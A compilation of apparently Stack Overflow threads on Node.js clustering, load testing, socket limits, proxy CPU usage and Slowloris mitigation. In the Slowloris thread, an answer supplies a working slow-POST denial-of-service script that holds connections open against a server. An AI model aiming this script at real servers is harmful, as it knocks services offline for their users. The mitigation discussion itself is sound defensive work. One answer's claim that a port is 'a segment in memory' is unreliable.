NodeJS cluster, is it really needed?

I decided to investigate the best possible way to handle a large amount of traffic with a NodeJS server, so I ran a small test on two DigitalOcean servers, each with 1GB RAM / 2 CPUs.
No-Cluster server code:
// Include Express
var express = require('express');
// Create a new Express application
var app = express();
// Add a basic route – index page
app.get('/', function (req, res) {
    res.redirect('http://www.google.co.il');
});
// Bind to a port
app.listen(3000);
console.log('Application running');
Cluster server code:
// Include the cluster module
var cluster = require('cluster');

// Code to run if we're in the master process
if (cluster.isMaster) {

    // Count the machine's CPUs
    var cpuCount = require('os').cpus().length;

    // Create a worker for each CPU
    for (var i = 0; i < cpuCount; i += 1) {
        cluster.fork();
    }

// Code to run if we're in a worker process
} else {

    // Include Express
    var express = require('express');

    // Create a new Express application
    var app = express();

    // Add a basic route – index page
    app.get('/', function (req, res) {
        res.redirect('http://www.walla.co.il');
    });

    // Bind to a port
    app.listen(3001);
    console.log('Application running #' + cluster.worker.id);
}
Then I sent stress-test requests to both servers. I expected the cluster server to handle more requests, but it didn't happen: both servers crashed under the same load, even though two Node services were running on the cluster server and only one on the non-cluster server.
Now I wonder why. Did I do anything wrong?
Maybe something else is making the servers reach their breaking point? Both servers crashed at ~800 rps.

> Now I wonder why? Did I do anything wrong?
Your test server doesn't do anything other than a res.redirect(). If your request handlers use essentially no CPU, then you aren't going to be CPU bound at all and you won't benefit from involving more CPUs. Your cluster will be bottlenecked at the handling of incoming connections which is going to be roughly the same with or without clustering.
Now, add some significant CPU usage to your request handler and you should get a different result.
For example, change to this:
// Add a basic route – index page
app.get('/', function (req, res) {
    // spin CPU for 200ms to simulate using some CPU in the request handler
    let start = Date.now();
    while (Date.now() - start < 200) {}
    res.redirect('http://www.walla.co.il');
});
Running tests is a great thing, but you have to be careful what exactly you're testing.

What @jfriend00 says is correct; you aren't actually doing enough heavy lifting to justify clustering. However, you're also not actually sharing the load. See here:
app.listen(3001);
You can't bind two services onto the same port and have the OS magically load-balance them[1]; try adding an error handler on app.listen() and see if you get an error, e.g.
app.listen(3001, (err) => { if (err) console.error(err); });
If you want to do this, you'll have to accept everything in your master, then instruct the workers to do the task, then pass the results back to the master again.
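A minimal sketch of that master-dispatch pattern, assuming the built-in cluster IPC channel (worker.send() in the master, process.on('message') / process.send() in the worker); the port and the message shape are placeholders, not a fixed API:
// Sketch: the master owns the only listening socket, hands each request to a
// worker over the cluster IPC channel, and writes the worker's result back.
var cluster = require('cluster');
var http = require('http');

if (cluster.isMaster) {
    var worker = cluster.fork();
    var pending = {};
    var nextId = 0;

    worker.on('message', function (msg) {
        var res = pending[msg.id];
        delete pending[msg.id];
        res.end(msg.body);
    });

    http.createServer(function (req, res) {
        var id = nextId++;
        pending[id] = res;
        worker.send({ id: id, url: req.url }); // instruct the worker to do the task
    }).listen(3001);
} else {
    process.on('message', function (msg) {
        // do the actual work here, then pass the result back to the master
        process.send({ id: msg.id, body: 'handled ' + msg.url });
    });
}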
It's generally easier not to do this in your Node program though; your frontend will still be the limiting factor. An easier (and faster) approach may be to put a special-purpose load balancer in front of multiple running instances of your application (e.g. HAProxy or Nginx).
[1]: That's actually a lie; sorry. You can do this by specifying SO_REUSEPORT when doing the initial bind call, but you can't explicitly specify that in Node, and Node doesn't specify it for you...so you can't in Node.

How to mitigate Slowloris in Node.js?

Update:
https://nodejs.org/pt-br/blog/vulnerability/february-2019-security-releases/
Update Friday, 13th 2018:
I managed to convince the Node.js core team to assign a CVE for this.
The fix (new defaults and probably a new API) will land in one or two weeks.
To mitigate means to reduce the severity of an attack.
Everybody knows Slowloris:
HTTP header or POST data characters are transmitted very slowly, to keep the socket occupied.
Scaled up, that makes for a very cheap DoS attack.
**In NGINX the mitigation is inbuilt:**
> Closing Slow Connections
> You can close connections that are writing
> data too infrequently, which can represent an attempt to keep
> connections open as long as possible (thus reducing the server’s
> ability to accept new connections). Slowloris is an example of this
> type of attack. The client_body_timeout directive controls how long
> NGINX waits between writes of the client body, and the
> client_header_timeout directive controls how long NGINX waits between
> writes of client headers. The default for both directives is 60
> seconds. This example configures NGINX to wait no more than 5 seconds
> between writes from the client for either headers or body.
https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/
Since there is no built-in way to act on the headers in the Node.js HTTP server, I came to the question of whether I can combine net and an HTTP server to mitigate Slowloris.
The idea is to `destroy` the `connection` in case of Slowloris, like this:
var http = require('http');

http.createServer(function(req, res) {
    var timeout;
    // reset the timer on every chunk; if no further data arrives within
    // 100ms, destroy the underlying socket
    req.connection.on('data', function(chunk) {
        clearTimeout(timeout);
        timeout = setTimeout(function() {
            req.connection.destroy();
        }, 100);
    });
});
The problem I can see is that both services would have to listen on the same socket, on ports 80 and 443. I do not know how to tackle this.
It is possible to transfer requests and responses from net to the HTTP server and back, but this takes two sockets for one incoming message and two sockets for one outgoing message, so it is not feasible for a highly available server.
I have no clue.
What can the world do to get rid of this scourge?
There is a CVE for this for Apache Tomcat.
This is a serious security threat.
I think this needs to be solved at the C or C++ level, and I cannot write those languages.
But it would help all of us if somebody pushed this on GitHub, because the community there once deleted my thread about mitigating Slowloris.
The best way to mitigate this issue, as well as a number of other issues, is to place a proxy layer such as nginx or a firewall between the node.js application and the internet.
If you're familiar with the paradigms behind many design and programming approaches, such as OOP, you will probably recognize the importance of "separation of concerns".
The same paradigm holds true when designing the infrastructure or the way clients can access data.
The application should have only one concern: handling data operations (CRUD). This inherently includes any concerns that relate to maintaining data integrity (SQL injection threats, script injection threats, etc.).
Other concerns should be placed in a separate layer, such as an nginx proxy layer.
For example, nginx will often be concerned with routing traffic to your application / load balancing. This will include security concerns related to network connections, such as SSL/TLS negotiation, slow clients, etc.
An extra firewall might (read: should) be implemented to handle additional security concerns.
The solution to your issue is simple: do not expose the node.js application directly to the internet; use a proxy layer - it exists for a reason.
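As a small, concrete illustration of that last point (assuming an Express app like the ones above), you can bind the Node.js process to the loopback interface only, so that it is reachable solely through the proxy layer listening on the public interface:
// Only the local proxy layer can reach this; nothing on the public
// interface can hit the Node.js process directly.
app.listen(3000, '127.0.0.1');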
I think you're taking a wrong approach for this vulnerability.
This doesn't deal with a DDoS attack (Distributed Denial of Service), where many IPs are used and you need to keep serving machines that are inside the same firewall as machines involved in the attack.
Often, machines used in a DDoS aren't real machines that have been taken over (they may be virtualized, or running software that attacks from different IPs).
When a DDoS against a large target starts, per-IP throttling may ban all machines from the same firewalled LAN.
To continue providing service in the face of a DDoS, you really need to block requests based on common elements of the request itself, not just IP. security.se may be the best forum for specific advice on how to do that.
Unfortunately, DoS attacks, unlike XSRF, don't need to originate from real browsers, so any headers that don't contain closely-held and unguessable nonces can be spoofed.
The recommendation: to prevent this issue, you have to have good firewall policies against DDoS attacks and large-scale denial of service.
BUT! If you want to test a denial of service against node.js, you can use this code (for test purposes only, not for a production environment):
var net = require('net');

var maxConnections = 30;
var connections = [];
var host = "127.0.0.1";
var port = 80;

function Connection(h, p)
{
    this.state = 'active';
    this.t = Date.now();
    this.client = net.connect({port:p, host:h}, () => {
        process.stdout.write("Connected, Sending... ");
        this.client.write("POST / HTTP/1.1\r\nHost: "+host+"\r\n" +
            "Content-Type: application/x-www-form-urlencoded\r\n" +
            "Content-Length: 385\r\n\r\nvx=321&d1=fire&l");
        process.stdout.write("Written.\n");
    });
    this.client.on('data', (data) => {
        console.log("\t-Received "+data.length+" bytes...");
        this.client.end();
    });
    this.client.on('end', () => {
        var d = Date.now() - this.t;
        this.state = 'ended';
        console.log("\t-Disconnected (duration: " +
            (d/1000).toFixed(3) +
            " seconds, remaining open: " +
            connections.length +
            ").");
    });
    this.client.on('error', () => {
        this.state = 'error';
    });
    connections.push(this);
}

setInterval(() => {
    var notify = false;
    // Add another connection if we haven't reached
    // our max:
    if(connections.length < maxConnections)
    {
        new Connection(host, port);
        notify = true;
    }
    // Remove dead connections
    connections = connections.filter(function(v) {
        return v.state=='active';
    });
    if(notify)
    {
        console.log("Active connections: " + connections.length +
            " / " + maxConnections);
    }
}, 500);
It is as easy as this.
var http = require('http');

var server = http.createServer(function(req, res) {
    res.end('Now.');
});

server.setTimeout(10);
server.listen(80, '127.0.0.1');
server.setTimeout([msecs][, callback])
> By default, the Server's timeout value is 2 minutes, and sockets are destroyed automatically if they time out.
https://nodejs.org/api/http.html#http_server_settimeout_msecs_callback
Tested with:
var net = require('net');

var client = new net.Socket();
client.connect(80, '127.0.0.1', function() {
    setInterval(function() {
        client.write('Hello World.');
    }, 10000);
});
This is only the second-best solution, though, since legitimate connections get terminated as well.
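For reference, here is a minimal sketch assuming a Node.js version that ships the header-phase timeout added by the security releases linked in the question (server.headersTimeout); unlike a blanket socket timeout, it only aborts sockets that are slow to finish sending their request headers:
var http = require('http');

var server = http.createServer(function (req, res) {
    res.end('Now.');
});

// Abort any socket that has not delivered complete request headers within
// 10 seconds; established, well-behaved connections are unaffected.
server.headersTimeout = 10 * 1000;

server.listen(80, '127.0.0.1');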

NodeJS cluster doesn't recognize the master worker in clustering

I'm trying to cluster my node server, so I was testing the example code below.
The code below worked the first time I tried it: I created a new js file and ran the code, and it worked flawlessly.
Then I deleted the 'practice' js file and moved exactly the same code into my server file to implement it.
Now it won't ever recognize the first process as the master... I have no idea what might have gone wrong.
I have tried setting process.env.NODE_UNIQUE_ID to undefined, but it won't reset the master worker! So every time I run this code, I get "Application running!" without "worker loop", which should show every time it loops through creating a worker, meaning it is not recognising the first process as the master.
Does anyone know what the problem might be?
const cluster = require('cluster');

if (cluster.isMaster) {
    var cpuCount = require('os').cpus().length;
    for (var i = 0; i < cpuCount; i++) {
        cluster.fork();
        console.log(`worker loop ${i}`);
    }
} else {
    var express = require('express');
    var app = express();

    app.get('/', function (req, res) {
        res.send('Hello World!');
    });

    app.listen(3000);
    console.log('Application running!');
}
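One way to check what is happening (a debugging sketch only, not a fix) is to log the values that decide the branch at startup. cluster.isMaster is false whenever NODE_UNIQUE_ID is present in the environment, so if that variable is somehow set when the server file starts, the master branch is skipped exactly as described.
// Debugging sketch: print the values that decide the master/worker branch.
const cluster = require('cluster');
console.log('NODE_UNIQUE_ID =', process.env.NODE_UNIQUE_ID);
console.log('cluster.isMaster =', cluster.isMaster);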

ENOBUFS when creating too many sockets with socket.io

What I am trying to do:
I'm writing a node.js client/server application which uses persistent websocket connections (no long-polling). I want to stress-test my server in order to tune its performance and know its limits, so that I can block new incoming connections when overloaded. Unfortunately, I get stuck at one specific number of socket connections every time, so I think it may be related to OS or node settings.
The problem:
I have one client which creates 10k socket connections, and the server handles this perfectly fine. When I start the second client with another 10k connections, I start getting the following errors in my client application once the server holds 14k concurrent connections:
engine.io-client:socket socket close with reason: "transport error"
+0ms engine.io-client:socket socket error {"type":"TransportError","description":{"code":"ENOBUFS","errno":"ENOBUFS","syscall":"connect","address":"127.0.0.1","port":5433,"type":"error","target":{"domain":null,"_events":{},"_eventsCount":4,"_socket":null,"_ultron":null,"_closeReceived":false,"bytesReceived":0,"readyState":0,"supports":{"binary":true},"extensions":{},"_isServer":false,"url":"ws://127.0.0.1:5433/socket.io/?EIO=3&transport=websocket","protocolVersion":13,"binaryType":"buffer"}}}
+0ms
My client1.js and client2.js look like this:
function createClient(){
    var socket = require('socket.io-client')('http://127.0.0.1:5433', {transports:['websocket']});
    socket.connect();

    // Send a bit of data every 2.5s to simulate a bit of traffic
    setInterval(function () {
        socket.emit("sessionCheck", "ok");
    }, 2500);
}

var clients = 0;
var id = setInterval(function() {
    createClient();
    clients++;
    if(clients >= 10000)
        clearInterval(id);
}, 1);
My server.js looks like this:
var http = require('http');
var fs = require('fs');

var httpServer = http.createServer(handler);
var io = require('socket.io')(httpServer, {pingTimeout: 60 * 1000, pingInterval: 5 * 1000});

io.on('connection', function (socket) {
    socket.on('sessionCheck', function(data){ onSessionCheck(socket, data); });
});

setInterval(function(){
    console.log(io.engine.clientsCount + " websockets are connected");
}, 5000);

httpServer.listen(5433, "0.0.0.0", 5000); // port, hostname, backlog
console.log("server running now...");

function onSessionCheck(){
    //console.log("Incoming check");
}

function handler (req, res) {
    fs.readFile(__dirname + '/index.html',
        function (err, data) {
            if (err) {
                res.writeHead(500);
                return res.end('Error loading index.html');
            }
            res.writeHead(200);
            res.end(data);
        });
}
You said in Slack you already know about --max-old-space-size and that you tried it and it did not help. Now I can confirm that using this option (I tried values 2048-65000) prevents me from getting more than ~18-20k concurrent connections from one server to another. Removing the option gives me ~29,500 concurrent connections. I use a $20 DigitalOcean VPS (2 GB, 2 cores), and 29,500 takes all the free memory of my server - that is why I can't have more connections for now.
UPDATE
Linux?
Try checking/tuning the following values on the server:
net.nf_conntrack_max (I use 65536)
net.netfilter.nf_conntrack_max (I use 65536)
cat /proc/sys/fs/nr_open gives 1048576 for me
cat /proc/sys/fs/file-nr gives 5056 0 2097152 for me
cat /proc/sys/fs/file-max gives 2097152 for me
net.ipv4.ip_local_port_range (I use 2000 65535)
net.core.somaxconn (I use 65000)
ulimit -n gives me 1048576
This may give you an inkling of how to set the params: https://easyengine.io/tutorials/linux/sysctl-conf/
Maybe you should also check some of these values on your client servers (like ip_local_port_range, file-nr, ulimit -n).
You might want to check the logs (/var/log/messages, /var/log/syslog, dmesg) as well.
I finally got 34,469 connections, and then the oom-killer killed node on my client machine.
The solution is, as I already assumed, an option in Windows (MaxUserPort), which you can change in regedit. Check the MSDN description to learn more about it: https://support.microsoft.com/en-us/kb/196271. You can set it to a maximum value of 65534.

Why does increasing worker_connections in Nginx make the application slower in a node.js cluster?

I'm converting my application to a node.js cluster, which I hope will boost its performance.
Currently, I'm deploying the application to 2 EC2 t2.medium instances. I have Nginx as a proxy and an ELB.
This is my Express cluster application, which is pretty standard from the documentation.
var bodyParser = require('body-parser');
var cors = require('cors');
var cluster = require('cluster');
var debug = require('debug')('expressapp');

if(cluster.isMaster) {
    var numWorkers = require('os').cpus().length;
    debug('Master cluster setting up ' + numWorkers + ' workers');

    for(var i = 0; i < numWorkers; i++) {
        cluster.fork();
    }

    cluster.on('online', function(worker) {
        debug('Worker ' + worker.process.pid + ' is online');
    });

    cluster.on('exit', function(worker, code, signal) {
        debug('Worker ' + worker.process.pid + ' died with code: ' + code + ', and signal: ' + signal);
        debug('Starting a new worker');
        cluster.fork();
    });
} else {
    // Express stuff
}
This is my Nginx configuration.
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '1024'
nginx::keepalive_timeout: '65'
I have 2 CPUs on the Nginx server.
This is my performance before the change:
I get 1,500 requests/s, which is pretty good. Then I thought I would increase the number of connections on Nginx so I could accept more requests, so I did this:
nginx::worker_processes: "%{::processorcount}"
nginx::worker_connections: '2048'
nginx::keepalive_timeout: '65'
And this is my performance after the change, which I think is worse than before.
I use Gatling for performance testing, and here's the code:
import io.gatling.core.Predef._
import io.gatling.http.Predef._
import scala.concurrent.duration._

class LoadTestSparrowCapture extends Simulation {
    val httpConf = http
        .baseURL("http://ELB")
        .acceptHeader("application/json")
        .doNotTrackHeader("1")
        .acceptLanguageHeader("en-US,en;q=0.5")
        .acceptEncodingHeader("gzip, deflate")
        .userAgentHeader("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0")

    val headers_10 = Map("Content-Type" -> "application/json")

    val scn = scenario("Load Test")
        .exec(http("request_1")
            .get("/track"))

    setUp(
        scn.inject(
            atOnceUsers(15000)
        ).protocols(httpConf))
}
I deployed this to my gatling cluster. So, I have 3 EC2 instances firing 15,000 requests in 30s to my application.
The question is: is there anything I can do to increase the performance of my application, or do I just need to add more machines?
The route that I'm testing is pretty simple: I get the request and send it off to RabbitMQ so it can be processed further, so the response of that route is pretty fast.
You've mentioned that you are using AWS with an ELB in front of your EC2 instances. As I see it, you are getting 502 and 503 status codes. These can be sent by the ELB or by your EC2 instances. Make sure that when doing the load test you know where the errors are coming from. You can check this in the AWS console, in the ELB CloudWatch metrics.
Basically, HTTPCode_ELB_5XX means your ELB sent the 50x; HTTPCode_Backend_5XX means your backend sent it. You can also verify this in the ELB logs. A better explanation of ELB errors can be found here.
To load-test on AWS you should definitely read this. The point is that the ELB is just another set of machines, which needs to scale if your load increases. The default scaling strategy is (cited from the section "Ramping Up Testing"):
> Once you have a testing tool in place, you will need to define the growth in the load. We recommend that you increase the load at a rate of no more than 50 percent every five minutes.
That means when you start at some number of concurrent users, let's say 1000, by default you should only increase up to 1500 within 5 minutes. This guarantees that the ELB will scale with the load on your servers. Exact numbers may vary and you have to test them on your own. The last time I tested it, it sustained a load of 1,200 req/s without an issue, and then I started to receive 50x errors. You can test this easily by running a ramp-up scenario from X to Y users from a single client and waiting for the 50x responses.
The next very important thing (from the section "DNS Resolution") is:
> If clients do not re-resolve the DNS at least once per minute, then the new resources Elastic Load Balancing adds to DNS will not be used by clients.
In short, it means that you have to guarantee that the DNS TTL is respected, or that your clients re-resolve and rotate the DNS IPs they receive from lookups, so that the load is distributed across ELB nodes in a round-robin fashion. If not (e.g. when testing from only one client - not your case), you can skew the results by targeting all the traffic at a single ELB instance and overloading it, which means the ELB will not scale at all.
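A small client-side sketch of that idea, assuming the plain dns module (the hostname and helper name are placeholders): re-resolve the ELB hostname periodically and spread new connections across whatever addresses come back, instead of pinning the whole test to a single ELB node.
// Sketch: pick a fresh ELB address for each batch of new test connections.
var dns = require('dns');

function pickElbAddress(hostname, callback) {
    dns.resolve4(hostname, function (err, addresses) {
        if (err) return callback(err);
        // rotate across all A records the ELB currently publishes
        callback(null, addresses[Math.floor(Math.random() * addresses.length)]);
    });
}

pickElbAddress('my-elb.example.com', function (err, address) {
    if (err) throw err;
    console.log('next batch of virtual users should target', address);
});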
Hope this helps.

Node.js CPU intensive high load for a script that forwards data from port to port

I have a problem with coding a node.js program that forwards traffic from one port to another. The scenario goes like this: I forward all traffic from port 55555 to an SSH tunnel that has a SOCKS5 proxy open on port 44444. Everything works smoothly, but when I run the command htop -d 1 I see high load while visiting 2-3 sites simultaneously. If I go through the SOCKS5 SSH tunnel directly, I see the load peak at 1% of a core, but with node.js I see 22%, 26%, 60%, 70%, even 100% sometimes. What is happening, and why? Think about what would happen when I open 1000 of those!
Here is my first try (proxy1.js):
var net = require('net');
require('longjohn');

var regex = /^[\x09\x0A\x0D\x20-\x7E]+$/;
var regexIP = /^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/;

// parse "80" and "localhost:80" or even "42mEANINg-life.com:80"
var addrRegex = /^(([a-zA-Z\-\.0-9]+):)?(\d+)$/;

var addr = {
    from: addrRegex.exec(process.argv[2]),
    to: addrRegex.exec(process.argv[3])
};

if (!addr.from || !addr.to) {
    console.log('Usage: <from> <to>');
    process.exit(1);
}

net.createServer(function(from) {
    var to = net.createConnection({
        host: addr.to[2],
        port: addr.to[3]
    });

    // REQUESTS BEGIN
    from.on('data', function(data){
    });
    from.on('end', function(end){
    });
    from.on('close', function(close){
    });
    // error handling
    from.on('error', function(error){
    });
    from.pipe(to);
    // REQUESTS END

    // RESPONSES BEGIN
    to.on('data', function(data){
    });
    to.on('end', function(end){
    });
    to.on('close', function(close){
    });
    to.on('error', function(error){
    });
    to.pipe(from);
    // RESPONSES END
}).listen(addr.from[3], addr.from[2]);
Here is my second try (proxy2.js):
var net = require('net');

var sourceport = 55555;
var destport = 62240;

net.createServer(function(s)
{
    var buff = "";
    var connected = false;
    var cli = net.createConnection(destport, "127.0.0.1");

    s.on('data', function(d) {
        if (connected)
        {
            cli.write(d);
        } else {
            buff += d.toString();
        }
    });
    s.on('error', function() {
    });

    cli.on('connect', function() {
        connected = true;
        cli.write(buff);
    });
    cli.on('error', function() {
    });

    cli.pipe(s);
}).listen(sourceport);
I also tried running cpulimit -l 10 nodejs proxy.js 55555 44444; it also produces load, and it seems like it is opening new forks/processes...
Server config:
cat /etc/issue: Ubuntu 14.04.3 LTS
nodejs --version: v0.10.25
Processor: Intel(R) Xeon(R) CPU E3-1246 v3 @ 3.50GHz with 8 cores
RAM: 32 GB (that stays free all the time)
Why is the load so big?
How can I write the code so that it doesn't create that load?
Why doesn't 'cpulimit -l 10 nodejs proxy.js 55555 44444' work as expected?
Why is node.js using CPU and not RAM?
Thanks in advance.
A port is merely a segment in memory, and writing to ports quickly can load the CPU because it may create too many async I/O requests; even though these requests are I/O bound, they are indirectly CPU bound.
To avoid this problem you may have to limit the number of requests by streaming data: rather than sending 1000 small requests, make 100 large requests.
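Purely as an illustrative sketch of that batching idea (not a tested fix, and the ports are just examples): collect incoming chunks and flush them to the upstream as one larger write on a fixed interval, instead of forwarding every small chunk immediately.
var net = require('net');

net.createServer(function (from) {
    var to = net.createConnection(44444, '127.0.0.1');
    var pending = [];

    from.on('data', function (chunk) {
        pending.push(chunk); // buffer small chunks instead of writing each one
    });

    var flush = setInterval(function () {
        if (pending.length) {
            to.write(Buffer.concat(pending)); // one larger write
            pending = [];
        }
    }, 50);

    from.on('close', function () {
        clearInterval(flush);
        to.end();
    });

    to.pipe(from); // responses still flow straight back to the client
}).listen(55555);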
I'm not sure how to solve this or what exactly is happening. Maybe socket.io with streaming can help.
